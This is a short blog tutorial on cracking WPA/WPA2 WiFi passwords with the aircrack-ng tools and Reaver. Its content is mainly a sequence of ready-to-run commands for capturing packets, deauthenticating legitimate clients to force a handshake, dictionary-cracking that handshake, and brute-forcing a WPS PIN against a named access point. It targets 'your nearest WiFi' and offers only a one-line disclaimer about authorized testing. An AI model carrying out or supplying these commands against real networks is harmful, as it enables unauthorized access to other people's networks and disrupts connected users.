How To Hack WAP or WPA2 WiFi Security Fully Explained

As Compared to WEP WiFi Hacking as explained on our previous tutorial, WPA/WPA2 is quite difficult and time consuming because of its Security. Cracking the password sometimes depends on your luck and success is not guaranteed.

..:: How to launch a Dictionary Attack on WPA Handshake ::..

You might get lucky and your nearest WiFi password may be based on a common dictionary word or number sequence. In such a case, you may succeed with a dictionary attack.

Step 1: Enable monitor mode on wireless interface

#airmon-ng start wlan0

This will start the monitor mode.

Step 2: Take note of the nearest WiFi networks.

#airodump-ng mon0

Step 3: Take note of the channel of your target network, dump packets from that channel and save them to a local capture file.

#airodump-ng -c6 mon0 -w capture_file

Step 4: Wait for WPA handshake capture

At this point, you can use 'aireplay-ng' to de-authenticate an associated legitimate client from the network. The point is that as he/she will authenticate again shortly, we will capture the handshake without having to wait too long:

#aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0

If you don't know the MAC of any associated client, simply 'broadcast' a 'deauth' to all clients:

#aireplay-ng --deauth 0 -a <AP_MAC> mon0

Step 5: After you grab a WPA handshake comes the hard part of brute forcing using a dictionary. Use 'aircrack-ng' for this:

#aircrack-ng capture_file-01.cap -w listfile.lst

Now say your prayers and hope the passphrase is present in the dictionary you choose.

You can also use online distributed WPA/WPA2 handshake cracking tool on this website:

Note that if the Access Point has WPS Enabled, it becomes easier to recover the WPA / WPA2 passphrase as there are only 11,000 possible combinations needed to brute force the WPS PIN due to an implementation flaw.

Another tool called 'Reaver' can be used for WPA cracking, if WPS is enabled.

Here's the sample use of reaver:

#reaver -i mon1 -a 94:D7:23:48:BE:78 -vv -c8

-i is for interface
-a "94.... " is the bssid of hotspot
-vv for verbose mode
-c to specify the channel

Disclaimer: This is for experimentation or authorized penetration testing purposes only.

Tutorial by : Pranshu
Copyright © 2016 Amar Helloween. Powered by Blogger.